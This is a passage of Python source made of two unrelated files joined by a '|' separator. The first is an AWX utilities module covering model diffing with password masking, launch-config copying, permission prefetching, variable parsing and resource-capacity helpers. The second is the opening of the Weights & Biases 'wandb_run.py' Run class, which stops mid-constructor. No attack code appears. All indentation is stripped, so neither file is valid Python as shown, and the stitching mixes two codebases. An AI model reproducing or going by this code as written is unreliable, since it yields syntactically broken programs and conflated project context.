allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {'user': ['last_login'], 'oauth2accesstoken': ['last_used'], 'oauth2application': ['client_secret']}
model_name = obj._meta.model_name
fields_excluded = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(model_name, [])
# see definition of from_db for CredentialType
# injection logic of any managed types are incompatible with activity stream
if model_name == 'credentialtype' and obj.managed and obj.namespace:
fields_excluded.extend(['inputs', 'injectors'])
if fields_excluded:
allowed_fields = [f for f in allowed_fields if f not in fields_excluded]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (isinstance(field_val, str) and field_val.startswith('$encrypted$')):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
from django.db.models import Model
if not (old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not (new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
def model_to_dict(obj, serializer_mapping=None):
"""
Serialize a model instance to a dictionary as best as possible
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
"""
Creates a new unsaved object of type Class2 using the fields from obj1
values in kwargs can override obj1
"""
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
"""
In-place operation.
Given two saved objects, copies related objects from obj1
to obj2 to field of same name, if field occurs in `fields`
"""
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
"""
Return type name for a given model class.
"""
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
"""
Return model class for a given type name.
"""
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def get_capacity_type(uj):
'''Used for UnifiedJob.capacity_type property, static method will work for partial objects'''
model_name = uj._meta.concrete_model._meta.model_name
if model_name in ('job', 'inventoryupdate', 'adhoccommand', 'jobtemplate', 'inventorysource'):
return 'execution'
elif model_name == 'workflowjob':
return None
elif model_name.startswith('unified'):
raise RuntimeError(f'Capacity type is undefined for {model_name} model')
elif model_name in ('projectupdate', 'systemjob', 'project', 'systemjobtemplate'):
return 'control'
raise RuntimeError(f'Capacity type does not apply to {model_name} model')
def prefetch_page_capabilities(model, page, prefetch_list, user):
"""
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
"""
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(
Q(Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) | Q(**{'%s__isnull' % res_path: True}))
)
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(_('Input type `{data_type}` is not a dictionary').format(data_type=data_type))
def parse_yaml_or_json(vars_str, silent_failure=True):
"""
Attempt to parse a string of variables.
First, with JSON parser, if that fails, then with PyYAML.
If both attempts fail, return an empty dictionary if `silent_failure`
is True, re-raise combination error if `silent_failure` if False.
"""
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_('Variables not compatible with JSON standard (error: {json_error})').format(json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(
_('Cannot parse as JSON (error: {json_error}) or ' 'YAML (error: {yaml_error}).').format(json_error=str(json_err), yaml_error=str(yaml_err))
)
return vars_dict
def convert_cpu_str_to_decimal_cpu(cpu_str):
"""Convert a string indicating cpu units to decimal.
Useful for dealing with cpu setting that may be expressed in units compatible with
kubernetes.
See https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/#cpu-units
"""
cpu = cpu_str
millicores = False
if cpu_str[-1] == 'm':
cpu = cpu_str[:-1]
millicores = True
try:
cpu = float(cpu)
except ValueError:
cpu = 1.0
millicores = False
logger.warning(f"Could not convert SYSTEM_TASK_ABS_CPU {cpu_str} to a decimal number, falling back to default of 1 cpu")
if millicores:
cpu = cpu / 1000
# Per kubernetes docs, fractional CPU less than .1 are not allowed
return max(0.1, round(cpu, 1))
def get_corrected_cpu(cpu_count): # formerlly get_cpu_capacity
"""Some environments will do a correction to the reported CPU number
because the given OpenShift value is a lie
"""
from django.conf import settings
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return convert_cpu_str_to_decimal_cpu(env_abscpu)
elif settings_abscpu is not None:
return convert_cpu_str_to_decimal_cpu(settings_abscpu)
return cpu_count # no correction
def get_cpu_effective_capacity(cpu_count):
from django.conf import settings
cpu_count = get_corrected_cpu(cpu_count)
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return max(1, int(cpu_count * forkcpu))
def convert_mem_str_to_bytes(mem_str):
"""Convert string with suffix indicating units to memory in bytes (base 2)
Useful for dealing with memory setting that may be expressed in units compatible with
kubernetes.
See https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/#meaning-of-memory
"""
# If there is no suffix, the memory sourced from the request is in bytes
if mem_str.isdigit():
return int(mem_str)
conversions = {
'Ei': lambda x: x * 2**60,
'E': lambda x: x * 10**18,
'Pi': lambda x: x * 2**50,
'P': lambda x: x * 10**15,
'Ti': lambda x: x * 2**40,
'T': lambda x: x * 10**12,
'Gi': lambda x: x * 2**30,
'G': lambda x: x * 10**9,
'Mi': lambda x: x * 2**20,
'M': lambda x: x * 10**6,
'Ki': lambda x: x * 2**10,
'K': lambda x: x * 10**3,
}
mem = 0
mem_unit = None
for i, char in enumerate(mem_str):
if not char.isdigit():
mem_unit = mem_str[i:]
mem = int(mem_str[:i])
break
if not mem_unit or mem_unit not in conversions.keys():
error = f"Unsupported value for SYSTEM_TASK_ABS_MEM: {mem_str}, memory must be expressed in bytes or with known suffix: {conversions.keys()}. Falling back to 1 byte"
logger.warning(error)
return 1
return max(1, conversions[mem_unit](mem))
def get_corrected_memory(memory):
from django.conf import settings
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
# Runner returns memory in bytes
# so we convert memory from settings to bytes as well.
if env_absmem is not None:
return convert_mem_str_to_bytes(env_absmem)
elif settings_absmem is not None:
return convert_mem_str_to_bytes(settings_absmem)
return memory
def get_mem_effective_capacity(mem_bytes):
from django.conf import settings
mem_bytes = get_corrected_memory(mem_bytes)
settings_mem_mb_per_fork = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_mem_mb_per_fork = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
if env_mem_mb_per_fork:
mem_mb_per_fork = int(env_mem_mb_per_fork)
elif settings_mem_mb_per_fork:
mem_mb_per_fork = int(settings_mem_mb_per_fork)
else:
mem_mb_per_fork = 100
# Per docs, deduct 2GB of memory from the available memory
# to cover memory consumption of background tasks when redis/web etc are colocated with
# the other control processes
memory_penalty_bytes = 2147483648
if settings.IS_K8S:
# In k8s, this is dealt with differently because
# redis and the web containers have their own memory allocation
memory_penalty_bytes = 0
# convert memory to megabytes because our setting of how much memory we
# should allocate per fork is in megabytes
mem_mb = (mem_bytes - memory_penalty_bytes) // 2**20
max_forks_based_on_memory = mem_mb // mem_mb_per_fork
return max(1, max_forks_based_on_memory)
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
"""
Context manager to ignore updating inventory computed fields.
"""
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times."""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
"""
Context manager to ignore moving groups/hosts when group is deleted.
"""
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
"""
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
"""
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
def get_pk_from_dict(_dict, key):
"""
Helper for obtaining a pk from user data dict or None if not present.
"""
try:
val = _dict[key]
if isinstance(val, object) and hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices():
from django.conf import settings
all_venv_paths = settings.CUSTOM_VENV_PATHS + [settings.BASE_VENV_PATH]
custom_venv_choices = []
for venv_path in all_venv_paths:
if os.path.exists(venv_path):
for d in os.listdir(venv_path):
if venv_path == settings.BASE_VENV_PATH and d == 'awx':
continue
if os.path.exists(os.path.join(venv_path, d, 'bin', 'pip')):
custom_venv_choices.append(os.path.join(venv_path, d))
return custom_venv_choices
def get_custom_venv_pip_freeze(venv_path):
pip_path = os.path.join(venv_path, 'bin', 'pip')
try:
freeze_data = subprocess.run([pip_path, "freeze"], capture_output=True)
pip_data = (freeze_data.stdout).decode('UTF-8')
return pip_data
except Exception:
logger.exception("Encountered an error while trying to run 'pip freeze' for custom virtual environments:")
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email', 'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None), 'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (
getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)
) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d), args=(path, data)).start()
return path
def truncate_stdout(stdout, size):
from awx.main.constants import ANSI_SGR_PATTERN
if size <= 0 or len(stdout) <= size:
return stdout
stdout = stdout[: (size - 1)] + u'\u2026'
set_count, reset_count = 0, 0
for m in ANSI_SGR_PATTERN.finditer(stdout):
if m.group() == u'\u001b[0m':
reset_count += 1
else:
set_count += 1
return stdout + u'\u001b[0m' * (set_count - reset_count)
def deepmerge(a, b):
"""
Merge dict structures and return the result.
>>> a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
>>> b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
>>> import pprint; pprint.pprint(deepmerge(a, b))
{'first': {'all_rows': {'fail': 'cat', 'number': '5', 'pass': 'dog'}}}
"""
if isinstance(a, dict) and isinstance(b, dict):
return dict([(k, deepmerge(a.get(k), b.get(k))) for k in set(a.keys()).union(b.keys())])
elif b is None:
return a
else:
return b
def create_partition(tblname, start=None, end=None, partition_label=None, minutely=False):
"""Creates new partition table for events.
- start defaults to beginning of current hour
- end defaults to end of current hour
- partition_label defaults to YYYYMMDD_HH
- minutely will create partitions that span _a single minute_ for testing purposes
"""
current_time = now()
if not start:
if minutely:
start = current_time.replace(microsecond=0, second=0)
else:
start = current_time.replace(microsecond=0, second=0, minute=0)
if not end:
if minutely:
end = start.replace(microsecond=0, second=0) + timedelta(minutes=1)
else:
end = start.replace(microsecond=0, second=0, minute=0) + timedelta(hours=1)
start_timestamp = str(start)
end_timestamp = str(end)
if not partition_label:
if minutely:
partition_label = start.strftime('%Y%m%d_%H%M')
else:
partition_label = start.strftime('%Y%m%d_%H')
with connection.cursor() as cursor:
cursor.execute(
f'CREATE TABLE IF NOT EXISTS {tblname}_{partition_label} '
f'PARTITION OF {tblname} '
f'FOR VALUES FROM (\'{start_timestamp}\') to (\'{end_timestamp}\');'
)
def cleanup_new_process(func):
"""
Cleanup django connection, cache connection, before executing new thread or processes entry point, func.
"""
@wraps(func)
def wrapper_cleanup_new_process(*args, **kwargs):
from awx.conf.settings import SettingsWrapper # noqa
django_connection.close()
django_cache.close()
SettingsWrapper.initialize()
return func(*args, **kwargs)
return wrapper_cleanup_new_process
|
wandb_run.py
|
import atexit
from datetime import timedelta
from enum import IntEnum
import glob
import json
import logging
import numbers
import os
import platform
import re
import sys
import threading
import time
import traceback
from types import TracebackType
from typing import (
Any,
Callable,
Dict,
List,
NamedTuple,
Optional,
Sequence,
TextIO,
Tuple,
Type,
Union,
)
from typing import TYPE_CHECKING
import click
import requests
from six import iteritems, string_types
from six.moves import _thread as thread
from six.moves.collections_abc import Mapping
from six.moves.urllib.parse import quote as url_quote
from six.moves.urllib.parse import urlencode
import wandb
from wandb import errors
from wandb import trigger
from wandb._globals import _datatypes_set_callback
from wandb.apis import internal, public
from wandb.apis.public import Api as PublicApi
from wandb.proto.wandb_internal_pb2 import (
FilePusherStats,
MetricRecord,
PollExitResponse,
RunRecord,
)
from wandb.util import (
add_import_hook,
is_unicode_safe,
sentry_set_scope,
to_forward_slash_path,
)
from wandb.viz import (
create_custom_chart,
custom_chart_panel_config,
CustomChart,
Visualize,
)
from . import wandb_artifacts
from . import wandb_config
from . import wandb_history
from . import wandb_metric
from . import wandb_summary
from .interface.artifacts import Artifact as ArtifactInterface
from .interface.interface import InterfaceBase
from .interface.summary_record import SummaryRecord
from .lib import (
apikey,
config_util,
deprecate,
filenames,
filesystem,
ipython,
module,
proto_util,
redirect,
sparkline,
telemetry,
)
from .lib.exit_hooks import ExitHooks
from .lib.git import GitRepo
from .lib.reporting import Reporter
from .wandb_artifacts import Artifact
from .wandb_settings import Settings, SettingsConsole
from .wandb_setup import _WandbSetup
if TYPE_CHECKING:
from .data_types import WBValue
from .wandb_alerts import AlertLevel
from .interface.artifacts import (
ArtifactEntry,
ArtifactManifest,
)
logger = logging.getLogger("wandb")
EXIT_TIMEOUT = 60
RUN_NAME_COLOR = "#cdcd00"
RE_LABEL = re.compile(r"[a-zA-Z0-9_-]+$")
class TeardownStage(IntEnum):
EARLY = 1
LATE = 2
class TeardownHook(NamedTuple):
call: Callable[[], None]
stage: TeardownStage
class RunStatusChecker(object):
"""Periodically polls the background process for relevant updates.
For now, we just use this to figure out if the user has requested a stop.
"""
def __init__(
self,
interface: InterfaceBase,
stop_polling_interval: int = 15,
retry_polling_interval: int = 5,
) -> None:
self._interface = interface
self._stop_polling_interval = stop_polling_interval
self._retry_polling_interval = retry_polling_interval
self._join_event = threading.Event()
self._stop_thread = threading.Thread(target=self.check_status)
self._stop_thread.name = "ChkStopThr"
self._stop_thread.daemon = True
self._stop_thread.start()
self._retry_thread = threading.Thread(target=self.check_network_status)
self._retry_thread.name = "NetStatThr"
self._retry_thread.daemon = True
self._retry_thread.start()
def check_network_status(self) -> None:
join_requested = False
while not join_requested:
status_response = self._interface.communicate_network_status()
if status_response and status_response.network_responses:
for hr in status_response.network_responses:
if (
hr.http_status_code == 200 or hr.http_status_code == 0
): # we use 0 for non-http errors (eg wandb errors)
wandb.termlog("{}".format(hr.http_response_text))
else:
wandb.termlog(
"{} encountered ({}), retrying request".format(
hr.http_status_code, hr.http_response_text.rstrip()
)
)
join_requested = self._join_event.wait(self._retry_polling_interval)
def check_status(self) -> None:
join_requested = False
while not join_requested:
status_response = self._interface.communicate_stop_status()
if status_response and status_response.run_should_stop:
# TODO(frz): This check is required
# until WB-3606 is resolved on server side.
if not wandb.agents.pyagent.is_running():
thread.interrupt_main()
return
join_requested = self._join_event.wait(self._stop_polling_interval)
def stop(self) -> None:
self._join_event.set()
def join(self) -> None:
self.stop()
self._stop_thread.join()
self._retry_thread.join()
class Run(object):
"""A unit of computation logged by wandb. Typically this is an ML experiment.
Create a run with `wandb.init()`:
<!--yeadoc-test:run-object-basic-->
```python
import wandb
run = wandb.init()
```
There is only ever at most one active `wandb.Run` in any process,
and it is accessible as `wandb.run`:
<!--yeadoc-test:global-run-object-->
```python
import wandb
assert wandb.run is None
wandb.init()
assert wandb.run is not None
```
anything you log with `wandb.log` will be sent to that run.
If you want to start more runs in the same script or notebook, you'll need to
finish the run that is in-flight. Runs can be finished with `wandb.finish` or
by using them in a `with` block:
<!--yeadoc-test:run-context-manager-->
```python
import wandb
wandb.init()
wandb.finish()
assert wandb.run is None
with wandb.init() as run:
pass # log data here
assert wandb.run is None
```
See the documentation for `wandb.init` for more on creating runs, or check out
[our guide to `wandb.init`](https://docs.wandb.ai/guides/track/launch).
In distributed training, you can either create a single run in the rank 0 process
and then log information only from that process or you can create a run in each process,
logging from each separately, and group the results together with the `group` argument
to `wandb.init`. For more details on distributed training with W&B, check out
[our guide](https://docs.wandb.ai/guides/track/advanced/distributed-training).
Currently there is a parallel `Run` object in the `wandb.Api`. Eventually these
two objects will be merged.
Attributes:
history: (History) Time series values, created with `wandb.log()`.
History can contain scalar values, rich media, or even custom plots
across multiple steps.
summary: (Summary) Single values set for each `wandb.log()` key. By
default, summary is set to the last value logged. You can manually
set summary to the best value, like max accuracy, instead of the
final value.
"""
_telemetry_obj: telemetry.TelemetryRecord
_teardown_hooks: List[TeardownHook]
_tags: Optional[Tuple[Any, ...]]
_entity: Optional[str]
_project: Optional[str]
_group: Optional[str]
_job_type: Optional[str]
_name: Optional[str]
_notes: Optional[str]
_run_obj: Optional[RunRecord]
_run_obj_offline: Optional[RunRecord]
# Use string literal anotation because of type reference loop
_backend: Optional["wandb.sdk.backend.backend.Backend"]
_internal_run_interface: Optional[
Union[
"wandb.sdk.interface.interface_queue.InterfaceQueue",
"wandb.sdk.interface.interface_grpc.InterfaceGrpc",
]
]
_wl: Optional[_WandbSetup]
_upgraded_version_message: Optional[str]
_deleted_version_message: Optional[str]
_yanked_version_message: Optional[str]
_out_redir: Optional[redirect.RedirectBase]
_err_redir: Optional[redirect.RedirectBase]
_redirect_cb: Optional[Callable[[str, str], None]]
_output_writer: Optional["filesystem.CRDedupedFile"]
_quiet: Optional[bool]
_atexit_cleanup_called: bool
_hooks: Optional[ExitHooks]
_exit_code: Optional[int]
_run_status_checker: Optional[RunStatusChecker]
_poll_exit_response: Optional[PollExitResponse]
_sampled_history: Optional[Dict[str, Union[Sequence[int], Sequence[float]]]]
_use_redirect: bool
_stdout_slave_fd: Optional[int]
_stderr_slave_fd: Optional[int]
_artifact_slots: List[str]
_init_pid: int
_iface_pid: Optional[int]
_iface_port: Optional[int]
_attach_id: Optional[str]
_final_summary: Optional[Dict[str, Any]]
def __init__(
self,
settings: Settings,
config: Optional[Dict[str, Any]] = None,
sweep_config: Optional[Dict[str, Any]] = None,
) -> None:
self._config = wandb_config.Config()
self._config._set_callback(self._config_callback)
self._config._set_settings(settings)
self._backend = None
self._internal_run_interface = None
self.summary = wandb_summary.Summary(
self._summary_get_current_summary_callback,
)
self.summary._set_update_callback(self._summary_update_callback)
self.history = wandb_history.History(self)
self.history._set_callback(self._history_callback)
_datatypes_set_callback(self._datatypes_callback)
self._settings = settings
self._wl = None
self._reporter: Optional[Reporter] = None
self._entity = None
self._project = None
self._group = None
self._job_type = None
self._run_id = settings.run_id
self._start_time = time.time()
self._starting_step = 0
self._name = None
self._notes = None
self._tags = None
self._remote_url = None
self._last_commit = None
self._hooks = None
self._teardown_hooks = []
self._redirect_cb = None
self._out_redir = None
self._err_redir = None
self.stdout_redirector = None
self.stderr_redirector = None
self._save_stdout = None
self._save_stderr = None
self._stdout_slave_fd = None
self._stderr_slave_fd = None
self._exit_code = None
self._exit_result = None
self._final_summary = None
self._sampled_history = None
self._jupyter_progress = None
self._quiet = self._settings._quiet
if self._settings._jupyter and ipython.in_jupyter():
self._jupyter_progress = ipython.jupyter_progress_bar()
self._output_writer = None
self._upgraded_version_message = None
self._deleted_version_message = None
self._yanked_version_message = None
self._used_artifact_slots: List[str] = []
# Pull info from settings
self._init_from_settings(settings)
# Initial scope setup for sentry. This might get changed when the
# actual run comes back.
sentry_set_scope(
"user",
entity=self._entity,
project=self._project,
email=self._settings.email,
)
# Returned from backend request_run(), set from wandb_init?
self._run_obj = None
self._run_obj_offline = None
# Created when the run "starts".
self._run_status_checker = None
self._poll_exit_response = None
# Initialize telemetry object
self._telemetry_obj = telemetry.TelemetryRecord()
# Populate config
config = config or dict()
wandb_key = "_wandb"
config.setdefault(wandb_key, dict())
self._launch_artifact_mapping: Dict[str, Any] = {}
self._unique_launch_artifact_sequence_names: Dict[str, Any] = {}
if settings.save_code and settings.program_relpath:
config[wandb_key]["code_path"] = to_forward_slash_path(
os.path.join("code", settings.program_relpath)
)
